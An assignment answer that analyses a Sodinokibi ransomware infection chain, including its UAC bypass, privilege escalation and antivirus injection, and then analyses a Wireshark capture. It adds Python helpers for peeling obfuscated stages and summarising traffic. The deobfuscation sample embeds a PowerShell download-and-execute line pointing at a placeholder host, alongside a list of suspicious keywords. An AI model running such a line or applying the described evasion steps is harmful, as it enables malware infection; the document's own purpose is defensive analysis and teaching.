BN200 Cyber Attacks And Network Protocol Analysers Assignment 2 Answer
A cyber attack is a malicious attempt by an individual or a group to compromise a target system or network for some gain. Such attacks are mounted mainly for two reasons: to disable the victim's system and take it offline, or to obtain root or administrator level access to it. Many attack methods exist to achieve these goals. They are categorised by the level of harm and the method used, for example malware, DoS or DDoS, man-in-the-middle (MITM), SQL injection, and so on.
a. Identification of a cyber-attack – Ransomware is a type of cyber-attack carried out by a malicious application that encrypts the victim's data and locks the target system. The attacker then demands a ransom, usually in cryptocurrency, to restore the data and unlock the system. Paying the ransom does not guarantee that the attacker will fully restore the system; in many cases they do not. Depending on the type of business and the value of the data, the attack is made more elaborate, so that the system itself cannot be accessed without entering a decryption key. Many types of ransomware are in use today, each variant more harmful than the last: crypto malware, lockers, scareware, doxware, Mac ransomware, ransomware-as-a-service (RaaS) and mobile-device ransomware.
c. Technique and tools used – The attacker here uses a simple phishing attack to deliver the infected file to the target system. An email is sent to the victim containing a zip file. The zip holds a malicious JavaScript file which in turn carries a PowerShell script. When the user opens it, the infection spreads through the system. The dropper is built so that the infection goes undetected by the antivirus application and passes the first line of defence. The infected file is first saved in the temporary directory under the name jurhtcbvj.tmp; it is a PowerShell script padded with a large number of exclamation marks. The file is launched by a PowerShell command that strips the exclamation marks and runs the real script. That script decodes and executes a further script containing .NET code encoded in Base64. Together with the previous PowerShell process, this script calls a function named Install1, which carries several modules, among them test.dll and another Base64-encoded script, that are loaded into memory for the following stages.

If it does not obtain full privileges at this point, the malware attempts to gain them through a User Account Control (UAC) bypass. Once it has enough access, it runs the remaining process in several phases. In the first phase the primary module is loaded into memory and in turn loads a related module. It calls CheckTokenMembership to confirm its privilege level. If the privileges are insufficient, it again uses the UAC bypass, writes itself into the registry and launches a new instance of explorer.exe to execute the scripts; in this way anything stored at that registry path is executed with the highest privilege on the system. In the second phase it loads portable executables directly into memory as the final payload and tries to inject the ransomware payload into the Ahnlab antivirus process.
If the malware finds the required service, it launches a sutoup.exe process and finally runs the payload, Sodinokibi. The malware encrypts data with RC4 and appends the file extension .grr to the encrypted files. Its configuration holds complete details of the processes to run and to kill, and of how to gain elevated privileges by exploiting CVE-2018-8453. Finally, a ransom note is displayed to the user.
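As an added example (not code from the original analysis or from the malware), the following Python script peels the layering described above: it strips the exclamation-mark padding, finds Base64 runs in what remains, decodes them (UTF-16LE for -EncodedCommand payloads; an embedded PE image is flagged rather than printed) and repeats on the result. The sample it runs on is constructed to mimic that layering; the URL, the fake module and the names in it are illustrative only, not indicators from the real sample.

```python
"""Triage helper for the layered PowerShell dropper described above.

Added example, not code from the original analysis. SAMPLE_TMP below is
CONSTRUCTED to mimic the described layering (exclamation-mark padding over
a script that carries Base64-encoded stages); the URL and names in it are
illustrative only, not indicators from the real sample.
"""
import base64
import binascii
import re
from typing import List, Optional

# --- constructed sample ------------------------------------------------------
INNER_SCRIPT = ("IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/Install1')")
FAKE_PE = b"MZ" + b"\x90" * 62            # stand-in for a Base64-wrapped .NET module
_ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode()
OUTER_SCRIPT = (
    "$m = [Convert]::FromBase64String('" + base64.b64encode(FAKE_PE).decode() + "');\n"
    "$e = '" + _ENCODED + "'; powershell -EncodedCommand $e"
)

def pad_with_bangs(text: str, every: int = 3) -> str:
    """Insert '!' after every N characters, as the dropper's .tmp file is padded."""
    return "".join(ch + ("!" if (i + 1) % every == 0 else "") for i, ch in enumerate(text))

SAMPLE_TMP = pad_with_bangs(OUTER_SCRIPT)

# --- deobfuscation -----------------------------------------------------------
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long enough to be a stage, not a word

def strip_padding(text: str) -> str:
    """Undo the padding exactly as the launcher command does: drop every '!'.
    (Like the launcher, this would also eat any '!' the real script needed.)"""
    return text.replace("!", "")

def is_text(s: str) -> bool:
    return all(c.isprintable() or c in "\r\n\t" for c in s)

def decode_blob(blob: str) -> Optional[str]:
    """Decode one Base64 run: return script text, a marker for a PE image, or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return None
    if raw[:2] == b"MZ":                              # embedded PE/.NET module (cf. test.dll)
        return f"<embedded PE image, {len(raw)} bytes>"
    for enc in ("utf-16le", "utf-8"):                 # -EncodedCommand payloads are UTF-16LE
        try:
            s = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if is_text(s):
            return s
    return None

def deobfuscate(text: str, max_depth: int = 5) -> List[str]:
    """Peel layers: strip '!', decode every Base64 stage found, recurse on the result.
    Returns the layers from outermost (after padding removal) to innermost."""
    layers: List[str] = []
    current = strip_padding(text)
    for _ in range(max_depth):
        layers.append(current)
        stages = [s for s in map(decode_blob, B64_RE.findall(current)) if s]
        if not stages:
            break
        current = strip_padding("\n".join(stages))
    return layers

SUSPICIOUS = ("-EncodedCommand", "FromBase64String", "IEX", "DownloadString", "Install1")

def indicators(layers: List[str]) -> List[str]:
    """Keywords worth flagging in any layer (Install1 is the function name given on the page)."""
    return sorted({kw for layer in layers for kw in SUSPICIOUS if kw in layer})

if __name__ == "__main__":
    found = deobfuscate(SAMPLE_TMP)
    for depth, layer in enumerate(found):
        print(f"--- layer {depth} ---\n{layer}")
    print("indicators:", indicators(found))
```

Running it on a real jurhtcbvj.tmp would replace SAMPLE_TMP with the file's contents; the point of decoding statically rather than letting PowerShell run the stages is that each layer is recovered without executing anything, and a PE image surfacing at any depth is the cue to carve it out for separate analysis.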
d. Preventive measures against the attack – the following best practices help defend against ransomware attacks.
- Keep the system up to date with the current virus definitions and updates, and apply available patches to all applications.
- Do not click on unexpected links or respond to emails from unknown senders.
- Keep a backup of important data on a portable storage device, and disconnect it once the backup is taken; a drive that stays attached is encrypted along with everything else.
- Do not act on unexpected pop-up notifications or prompts while browsing.
- Do not download data or executables from unknown sources.
B. Network Protocol Analyser
A network protocol analyser is a tool used to capture network packets, or traffic, on a communication channel, anything from a local Ethernet segment to a satellite link. It is used to sniff traffic, analyse network packets and find any suspicious activity taking place on the network. Wireshark is one of the most widely used network analysis tools; it sniffs every packet on a chosen interface in real time. It is free to use and is mainly used for network troubleshooting.
- Details of analysed traffic – Most of the traffic is HTTPS (HTTP over TLS) carried by TCP. Packet length varies with the payload size, port and protocol in use. Both IPv4 and IPv6 addresses appear as source and destination. Many packets are identified as QUIC "Protected Payload (KP0)"; others are TLS application data, Client Hello, DNS standard queries, Certificate and Key Exchange, and TCP SYN and ACK packets. Details can be seen in the figure below.
Figure – Wireshark captures
- Details of NAT or routable IP addresses – The capturing host uses the IPv4 address 192.168.43.169, which lies in the RFC 1918 private range 192.168.0.0/16 and is not routable on the internet, while the HTTPS servers it talks to on port 443 have public addresses. The local gateway (192.168.43.1, the only other address on that subnet) must therefore translate the private source address, so the IPv4 sessions in this capture do pass through NAT, even though a capture taken on the host only ever shows the pre-translation private address. The IPv6 addresses (2404:...) are global unicast addresses and are routable end to end without translation. Applying the 'nat-pmp' display filter in Wireshark shows no packets, but that filter only matches NAT Port Mapping Protocol control messages; their absence says nothing about whether translation takes place.
- Address and port details – The communication captured during this time frame uses both IPv4 and IPv6 addresses. Some addresses appear far more often than others. The most used IPv6 addresses are 2404:205:128b:caf3:558a:1041:2ffe:45e9, 2404:6800:4002:80b::200e, 2404:6800:4003:802::2004 and 2404:6800:4003:c01::bd; the most used IPv4 addresses are 192.168.43.169 (the capturing host) and 192.168.43.1 (the local gateway). The ports seen with these addresses are 443 (HTTPS and QUIC), 80 (HTTP), 53 (DNS) and the ephemeral client ports 52742 and 57574.
- Details of findings – All the packets were captured on the Ethernet interface. Analysing the hundreds of captured packets, we found many entries with different source and destination IP addresses, both IPv4 and IPv6. The overall communication uses the TCP, UDP, QUIC and DNS protocols, and packet length depends on the protocol in use (HTTP, HTTPS, DNS, etc.). The "Protected Payload (KP0)" packets are not HTTPS over TCP: the label is Wireshark's name for a QUIC 1-RTT packet encrypted under key phase 0, carried over UDP port 443, which usually means HTTP/3. Their contents are encrypted, as are the TLS records carried over TCP. The TLS application data mostly uses HTTPS on port 443 over IPv4, and within each connection the same pair of IPv4 addresses appears, swapped between source and destination according to the direction of the packet. Many packets use TLS version 1.2 to protect application data. Several PSH, ACK, SYN and RST packets were also captured. Wireshark captures almost every packet passing between this system and the internet (an external server or destination), and for each captured frame shows details such as frame size, interface, source address and port, destination address and port, protocol and packet length.
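The following Python script, added here as an example and not part of the original assignment, shows how the address, port, NAT and protocol findings above can be produced from a Wireshark CSV export (File -> Export Packet Dissections -> As CSV, with two custom port columns added) instead of by eye: it counts addresses and ports, classifies each row, and infers NAT from address scope (an RFC 1918 source talking to a routable destination) rather than from NAT-PMP control messages. The rows are constructed to resemble the capture described on the page (same address ranges, ports and Info strings); 203.0.113.10 from the TEST-NET-3 documentation range stands in for the real HTTPS server, and port 60000, the DNS transaction ID and the timings are made up.

```python
"""Summarise a Wireshark CSV export (File -> Export Packet Dissections -> As CSV).

Added example, not part of the original assignment. SAMPLE_CSV is CONSTRUCTED
to resemble the capture described on the page; the SrcPort/DstPort columns are
assumed to have been added as custom columns in Wireshark before export.
"""
import csv
import io
import ipaddress
import re
from collections import Counter
from typing import Dict, List

SAMPLE_CSV = '''\
"No.","Time","Source","Destination","SrcPort","DstPort","Protocol","Length","Info"
"1","0.000","192.168.43.169","192.168.43.1","57574","53","DNS","74","Standard query 0x1a2b A www.example.com"
"2","0.021","192.168.43.1","192.168.43.169","53","57574","DNS","90","Standard query response 0x1a2b A 203.0.113.10"
"3","0.030","192.168.43.169","203.0.113.10","52742","443","TCP","74","52742 > 443 [SYN] Seq=0 Win=64240 Len=0"
"4","0.080","203.0.113.10","192.168.43.169","443","52742","TCP","74","443 > 52742 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0"
"5","0.081","192.168.43.169","203.0.113.10","52742","443","TLSv1.2","571","Client Hello"
"6","0.140","203.0.113.10","192.168.43.169","443","52742","TLSv1.2","1514","Server Hello, Certificate, Server Key Exchange, Server Hello Done"
"7","0.150","192.168.43.169","203.0.113.10","52742","443","TLSv1.2","200","Application Data"
"8","0.200","2404:205:128b:caf3:558a:1041:2ffe:45e9","2404:6800:4002:80b::200e","60000","443","QUIC","1292","Protected Payload (KP0)"
"9","0.210","2404:6800:4002:80b::200e","2404:205:128b:caf3:558a:1041:2ffe:45e9","443","60000","QUIC","1292","Protected Payload (KP0)"
"10","0.300","192.168.43.169","203.0.113.10","52742","443","TCP","54","52742 > 443 [RST, ACK] Seq=200 Ack=1 Win=0 Len=0"
'''

Row = Dict[str, str]

def parse(text: str) -> List[Row]:
    return list(csv.DictReader(io.StringIO(text)))

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ULA = ipaddress.ip_network("fc00::/7")

def scope(addr: str) -> str:
    """'private' for RFC 1918 / IPv6 ULA, 'local' for loopback, link-local and
    multicast, otherwise 'routable' (the ipaddress module's is_private is not used
    because it also treats documentation ranges such as TEST-NET as private)."""
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in RFC1918) or ip in ULA:
        return "private"
    if ip.is_loopback or ip.is_link_local or ip.is_multicast:
        return "local"
    return "routable"

def nat_required(rows: List[Row]) -> bool:
    """True when a packet pairs a private address with a routable one: the far end
    can never see the private address, so a gateway must translate it. A host-side
    capture only ever shows the pre-translation address, hence inferred, not observed."""
    return any({scope(r["Source"]), scope(r["Destination"])} == {"private", "routable"}
               for r in rows)

def classify(row: Row) -> str:
    proto, info = row["Protocol"], row["Info"]
    if proto == "QUIC" and "Protected Payload (KP0)" in info:
        return "QUIC/UDP (1-RTT packet, key phase 0)"   # Wireshark's label for encrypted QUIC
    if proto.startswith("TLSv"):
        kind = "application data" if info == "Application Data" else "handshake: " + info
        return f"TLS/TCP ({proto} {kind})"
    if proto == "DNS":                                   # DNS over UDP, as in this capture
        return "DNS/UDP (" + ("response" if "response" in info else "query") + ")"
    if proto == "TCP":                                   # bare segments: flags only
        flags = re.search(r"\[([^\]]+)\]", info)
        return "TCP control (" + (flags.group(1) if flags else "?") + ")"
    return proto

def address_counts(rows: List[Row]) -> Counter:
    return Counter(a for r in rows for a in (r["Source"], r["Destination"]))

def port_counts(rows: List[Row]) -> Counter:
    return Counter(int(p) for r in rows for p in (r["SrcPort"], r["DstPort"]))

def summary(rows: List[Row]) -> Dict[str, object]:
    v4 = [r for r in rows if ":" not in r["Source"]]
    v6 = [r for r in rows if ":" in r["Source"]]
    return {
        "ipv4_nat": nat_required(v4),
        "ipv6_nat": nat_required(v6),
        "top_addresses": address_counts(rows).most_common(3),
        "top_ports": port_counts(rows).most_common(3),
        "classes": Counter(classify(r) for r in rows),
    }

if __name__ == "__main__":
    for key, value in summary(parse(SAMPLE_CSV)).items():
        print(f"{key}: {value}")
```

On the constructed rows the summary reports NAT for the IPv4 sessions (private host to routable server) and none for the IPv6 ones (global to global), 443 as the busiest port, and the KP0 rows classified as QUIC over UDP rather than as TLS over TCP; the same code runs unchanged on a real export with the same columns.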